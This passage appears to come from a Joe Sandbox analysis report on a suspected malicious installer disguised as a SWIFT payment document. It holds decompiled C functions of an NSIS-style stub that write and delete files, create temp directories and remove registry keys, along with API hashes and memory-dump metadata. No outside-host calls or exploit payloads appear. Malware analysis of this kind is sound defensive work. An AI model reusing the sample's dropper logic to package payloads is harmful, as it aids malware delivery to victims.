                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                  • API String ID: 1451636040-1158693248
                                                                                  • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                  • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                                  • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                  • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 93%
                                                                                  			E00402950(void* __ebx) {
                                                                                  				WCHAR* _t26;
                                                                                  				void* _t29;
                                                                                  				long _t37;
                                                                                  				void* _t49;
                                                                                  				void* _t52;
                                                                                  				void* _t54;
                                                                                  				void* _t56;
                                                                                  				void* _t59;
                                                                                  				void* _t60;
                                                                                  				void* _t61;
                                                                                  
                                                                                  				_t49 = __ebx;
                                                                                  				_t52 = 0xfffffd66;
                                                                                  				_t26 = E00402DA6(0xfffffff0);
                                                                                  				_t55 = _t26;
                                                                                  				 *(_t61 - 0x40) = _t26;
                                                                                  				if(E00405FAE(_t26) == 0) {
                                                                                  					E00402DA6(0xffffffed);
                                                                                  				}
                                                                                  				E00406133(_t55);
                                                                                  				_t29 = E00406158(_t55, 0x40000000, 2);
                                                                                  				 *(_t61 + 8) = _t29;
                                                                                  				if(_t29 != 0xffffffff) {
                                                                                  					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                                                  					if( *(_t61 - 0x28) != _t49) {
                                                                                  						_t37 =  *0x42a274;
                                                                                  						 *(_t61 - 0x44) = _t37;
                                                                                  						_t54 = GlobalAlloc(0x40, _t37);
                                                                                  						if(_t54 != _t49) {
                                                                                  							E004035F8(_t49);
                                                                                  							E004035E2(_t54,  *(_t61 - 0x44));
                                                                                  							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                                                  							 *(_t61 - 0x10) = _t59;
                                                                                  							if(_t59 != _t49) {
                                                                                  								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                                                  								while( *_t59 != _t49) {
                                                                                  									_t51 =  *_t59;
                                                                                  									_t60 = _t59 + 8;
                                                                                  									 *(_t61 - 0x3c) =  *_t59;
                                                                                  									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                                  									_t59 = _t60 +  *(_t61 - 0x3c);
                                                                                  								}
                                                                                  								GlobalFree( *(_t61 - 0x10));
                                                                                  							}
                                                                                  							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                                                  							GlobalFree(_t54);
                                                                                  							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                                                  						}
                                                                                  					}
                                                                                  					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                                                  					CloseHandle( *(_t61 + 8));
                                                                                  				}
                                                                                  				_t56 = 0xfffffff3;
                                                                                  				if(_t52 < _t49) {
                                                                                  					_t56 = 0xffffffef;
                                                                                  					DeleteFileW( *(_t61 - 0x40));
                                                                                  					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                                  				}
                                                                                  				_push(_t56);
                                                                                  				E00401423();
                                                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                                                                                  				return 0;
                                                                                  			}













                                                                                  0x00402950
                                                                                  0x00402952
                                                                                  0x00402957
                                                                                  0x0040295c
                                                                                  0x0040295f
                                                                                  0x00402969
                                                                                  0x0040296d
                                                                                  0x0040296d
                                                                                  0x00402973
                                                                                  0x00402980
                                                                                  0x00402988
                                                                                  0x0040298b
                                                                                  0x00402997
                                                                                  0x0040299a
                                                                                  0x004029a0
                                                                                  0x004029ae
                                                                                  0x004029b3
                                                                                  0x004029b7
                                                                                  0x004029ba
                                                                                  0x004029c3
                                                                                  0x004029cf
                                                                                  0x004029d3
                                                                                  0x004029d6
                                                                                  0x004029e0
                                                                                  0x004029ff
                                                                                  0x004029e7
                                                                                  0x004029ec
                                                                                  0x004029f4
                                                                                  0x004029f7
                                                                                  0x004029fc
                                                                                  0x004029fc
                                                                                  0x00402a06
                                                                                  0x00402a06
                                                                                  0x00402a13
                                                                                  0x00402a19
                                                                                  0x00402a1f
                                                                                  0x00402a1f
                                                                                  0x004029b7
                                                                                  0x00402a33
                                                                                  0x00402a35
                                                                                  0x00402a35
                                                                                  0x00402a3f
                                                                                  0x00402a40
                                                                                  0x00402a44
                                                                                  0x00402a48
                                                                                  0x00402a4e
                                                                                  0x00402a4e
                                                                                  0x00402a55
                                                                                  0x004022f1
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                  • GlobalFree.KERNEL32 ref: 00402A06
                                                                                  • GlobalFree.KERNEL32 ref: 00402A19
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2667972263-0
                                                                                  • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                  • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                                  • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                  • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 77%
                                                                                  			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                  				char _v68;
                                                                                  				char _v132;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				signed int _t23;
                                                                                  				signed int _t24;
                                                                                  				void* _t31;
                                                                                  				void* _t33;
                                                                                  				void* _t34;
                                                                                  				void* _t44;
                                                                                  				signed int _t46;
                                                                                  				signed int _t50;
                                                                                  				signed int _t52;
                                                                                  				signed int _t53;
                                                                                  				signed int _t55;
                                                                                  
                                                                                  				_t23 = _a16;
                                                                                  				_t53 = _a12;
                                                                                  				_t44 = 0xffffffdc;
                                                                                  				if(_t23 == 0) {
                                                                                  					_push(0x14);
                                                                                  					_pop(0);
                                                                                  					_t24 = _t53;
                                                                                  					if(_t53 < 0x100000) {
                                                                                  						_push(0xa);
                                                                                  						_pop(0);
                                                                                  						_t44 = 0xffffffdd;
                                                                                  					}
                                                                                  					if(_t53 < 0x400) {
                                                                                  						_t44 = 0xffffffde;
                                                                                  					}
                                                                                  					if(_t53 < 0xffff3333) {
                                                                                  						_t52 = 0x14;
                                                                                  						asm("cdq");
                                                                                  						_t24 = 1 / _t52 + _t53;
                                                                                  					}
                                                                                  					_t25 = _t24 & 0x00ffffff;
                                                                                  					_t55 = _t24 >> 0;
                                                                                  					_t46 = 0xa;
                                                                                  					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                  				} else {
                                                                                  					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                  					_t50 = 0;
                                                                                  				}
                                                                                  				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                  				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                                                                                  				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                                                                                  				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                  				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                                                                  			}



















                                                                                  0x00404e7a
                                                                                  0x00404e7f
                                                                                  0x00404e87
                                                                                  0x00404e88
                                                                                  0x00404e95
                                                                                  0x00404e9d
                                                                                  0x00404e9e
                                                                                  0x00404ea0
                                                                                  0x00404ea2
                                                                                  0x00404ea4
                                                                                  0x00404ea7
                                                                                  0x00404ea7
                                                                                  0x00404eae
                                                                                  0x00404eb4
                                                                                  0x00404eb4
                                                                                  0x00404ebb
                                                                                  0x00404ec2
                                                                                  0x00404ec5
                                                                                  0x00404ec8
                                                                                  0x00404ec8
                                                                                  0x00404ecc
                                                                                  0x00404edc
                                                                                  0x00404ede
                                                                                  0x00404ee1
                                                                                  0x00404e8a
                                                                                  0x00404e8a
                                                                                  0x00404e91
                                                                                  0x00404e91
                                                                                  0x00404ee9
                                                                                  0x00404ef4
                                                                                  0x00404f0a
                                                                                  0x00404f1b
                                                                                  0x00404f37

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                  • wsprintfW.USER32 ref: 00404F1B
                                                                                  • SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                  • String ID: %u.%u%s%s$H7B
                                                                                  • API String ID: 3540041739-107966168
                                                                                  • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                  • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                                  • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                  • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00405B99(WCHAR* _a4) {
                                                                                  				struct _SECURITY_ATTRIBUTES _v16;
                                                                                  				struct _SECURITY_DESCRIPTOR _v36;
                                                                                  				long _t23;
                                                                                  
                                                                                  				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                  				_v36.Owner = 0x4083f8;
                                                                                  				_v36.Group = 0x4083f8;
                                                                                  				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                  				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                  				_v16.lpSecurityDescriptor =  &_v36;
                                                                                  				_v36.Revision = 1;
                                                                                  				_v36.Control = 4;
                                                                                  				_v36.Dacl = 0x4083e8;
                                                                                  				_v16.nLength = 0xc;
                                                                                  				if(CreateDirectoryW(_a4,  &_v16) != 0) {
                                                                                  					L1:
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_t23 = GetLastError();
                                                                                  				if(_t23 == 0xb7) {
                                                                                  					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                  						goto L1;
                                                                                  					}
                                                                                  					return GetLastError();
                                                                                  				}
                                                                                  				return _t23;
                                                                                  			}






                                                                                  0x00405ba4
                                                                                  0x00405ba8
                                                                                  0x00405bab
                                                                                  0x00405bb1
                                                                                  0x00405bb5
                                                                                  0x00405bb9
                                                                                  0x00405bc1
                                                                                  0x00405bc8
                                                                                  0x00405bce
                                                                                  0x00405bd5
                                                                                  0x00405be4
                                                                                  0x00405be6
                                                                                  0x00000000
                                                                                  0x00405be6
                                                                                  0x00405bf0
                                                                                  0x00405bf7
                                                                                  0x00405c0d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405c0f
                                                                                  0x00405c13

                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                  • GetLastError.KERNEL32 ref: 00405BF0
                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                  • GetLastError.KERNEL32 ref: 00405C0F
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 3449924974-3936084776
                                                                                  • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                  • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                  • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                  • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 48%
                                                                                  			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                  				void* _v8;
                                                                                  				int _v12;
                                                                                  				short _v536;
                                                                                  				void* _t27;
                                                                                  				signed int _t33;
                                                                                  				intOrPtr* _t35;
                                                                                  				signed int _t45;
                                                                                  				signed int _t46;
                                                                                  				signed int _t47;
                                                                                  
                                                                                  				_t46 = _a12;
                                                                                  				_t47 = _t46 & 0x00000300;
                                                                                  				_t45 = _t46 & 0x00000001;
                                                                                  				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                                  				if(_t27 == 0) {
                                                                                  					if((_a12 & 0x00000002) == 0) {
                                                                                  						L3:
                                                                                  						_push(0x105);
                                                                                  						_push( &_v536);
                                                                                  						_push(0);
                                                                                  						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                                  							__eflags = _t45;
                                                                                  							if(__eflags != 0) {
                                                                                  								L10:
                                                                                  								RegCloseKey(_v8);
                                                                                  								return 0x3eb;
                                                                                  							}
                                                                                  							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                                                  							__eflags = _t33;
                                                                                  							if(_t33 != 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_push(0x105);
                                                                                  							_push( &_v536);
                                                                                  							_push(_t45);
                                                                                  						}
                                                                                  						RegCloseKey(_v8);
                                                                                  						_t35 = E00406A35(3);
                                                                                  						if(_t35 != 0) {
                                                                                  							return  *_t35(_a4, _a8, _t47, 0);
                                                                                  						}
                                                                                  						return RegDeleteKeyW(_a4, _a8);
                                                                                  					}
                                                                                  					_v12 = 0;
                                                                                  					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                  						goto L10;
                                                                                  					}
                                                                                  					goto L3;
                                                                                  				}
                                                                                  				return _t27;
                                                                                  			}












                                                                                  0x00402eb4
                                                                                  0x00402ebd
                                                                                  0x00402ec6
                                                                                  0x00402ed2
                                                                                  0x00402edb
                                                                                  0x00402ee5
                                                                                  0x00402f0a
                                                                                  0x00402f10
                                                                                  0x00402f15
                                                                                  0x00402f16
                                                                                  0x00402f46
                                                                                  0x00402f1f
                                                                                  0x00402f21
                                                                                  0x00402f71
                                                                                  0x00402f74
                                                                                  0x00000000
                                                                                  0x00402f7a
                                                                                  0x00402f30
                                                                                  0x00402f35
                                                                                  0x00402f37
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402f3f
                                                                                  0x00402f44
                                                                                  0x00402f45
                                                                                  0x00402f45
                                                                                  0x00402f52
                                                                                  0x00402f5a
                                                                                  0x00402f61
                                                                                  0x00000000
                                                                                  0x00402f8a
                                                                                  0x00000000
                                                                                  0x00402f69
                                                                                  0x00402ef5
                                                                                  0x00402f08
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402f08
                                                                                  0x00402f90

                                                                                  APIs
                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseEnum$DeleteValue
                                                                                  • String ID:
                                                                                  • API String ID: 1354259210-0
                                                                                  • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                  • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                  • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                  • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 77%
                                                                                  			E00401D81(void* __ebx, void* __edx) {
                                                                                  				struct HWND__* _t30;
                                                                                  				WCHAR* _t38;
                                                                                  				void* _t48;
                                                                                  				void* _t53;
                                                                                  				signed int _t55;
                                                                                  				signed int _t60;
                                                                                  				long _t63;
                                                                                  				void* _t65;
                                                                                  
                                                                                  				_t53 = __ebx;
                                                                                  				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                                  					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                                  				} else {
                                                                                  					E00402D84(2);
                                                                                  					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                                  				}
                                                                                  				_t55 =  *(_t65 - 0x24);
                                                                                  				 *(_t65 + 8) = _t30;
                                                                                  				_t60 = _t55 & 0x00000004;
                                                                                  				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                                  				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                                  				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                                  				if((_t55 & 0x00010000) == 0) {
                                                                                  					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                                  				} else {
                                                                                  					_t38 = E00402DA6(0x11);
                                                                                  				}
                                                                                  				 *(_t65 - 0x44) = _t38;
                                                                                  				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                                  				asm("sbb esi, esi");
                                                                                  				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                                  				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                                  				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                                  					DeleteObject(_t48);
                                                                                  				}
                                                                                  				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                                  					_push(_t63);
                                                                                  					E004065AF();
                                                                                  				}
                                                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                                                                                  				return 0;
                                                                                  			}











                                                                                  0x00401d81
                                                                                  0x00401d85
                                                                                  0x00401d9a
                                                                                  0x00401d87
                                                                                  0x00401d89
                                                                                  0x00401d8f
                                                                                  0x00401d8f
                                                                                  0x00401da0
                                                                                  0x00401da3
                                                                                  0x00401dad
                                                                                  0x00401db0
                                                                                  0x00401db8
                                                                                  0x00401dc9
                                                                                  0x00401dcc
                                                                                  0x00401dd7
                                                                                  0x00401dce
                                                                                  0x00401dd0
                                                                                  0x00401dd0
                                                                                  0x00401ddb
                                                                                  0x00401de5
                                                                                  0x00401e0c
                                                                                  0x00401e1b
                                                                                  0x00401e29
                                                                                  0x00401e31
                                                                                  0x00401e39
                                                                                  0x00401e39
                                                                                  0x00401e42
                                                                                  0x00401e48
                                                                                  0x00402ba4
                                                                                  0x00402ba4
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                  • String ID:
                                                                                  • API String ID: 1849352358-0
                                                                                  • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                  • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                                  • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                  • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 73%
                                                                                  			E00401E4E(intOrPtr __edx) {
                                                                                  				void* __edi;
                                                                                  				int _t9;
                                                                                  				signed char _t15;
                                                                                  				struct HFONT__* _t18;
                                                                                  				intOrPtr _t30;
                                                                                  				void* _t31;
                                                                                  				struct HDC__* _t33;
                                                                                  				void* _t35;
                                                                                  
                                                                                  				_t30 = __edx;
                                                                                  				_t33 = GetDC( *(_t35 - 8));
                                                                                  				_t9 = E00402D84(2);
                                                                                  				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                  				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                                  				ReleaseDC( *(_t35 - 8), _t33);
                                                                                  				 *0x40ce08 = E00402D84(3);
                                                                                  				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                                  				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                  				 *0x40ce0f = 1;
                                                                                  				 *0x40ce0c = _t15 & 0x00000001;
                                                                                  				 *0x40ce0d = _t15 & 0x00000002;
                                                                                  				 *0x40ce0e = _t15 & 0x00000004;
                                                                                  				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                                                                                  				_t18 = CreateFontIndirectW(0x40cdf8);
                                                                                  				_push(_t18);
                                                                                  				_push(_t31);
                                                                                  				E004065AF();
                                                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                  				return 0;
                                                                                  			}











                                                                                  0x00401e4e
                                                                                  0x00401e59
                                                                                  0x00401e5b
                                                                                  0x00401e68
                                                                                  0x00401e7f
                                                                                  0x00401e84
                                                                                  0x00401e91
                                                                                  0x00401e96
                                                                                  0x00401e9a
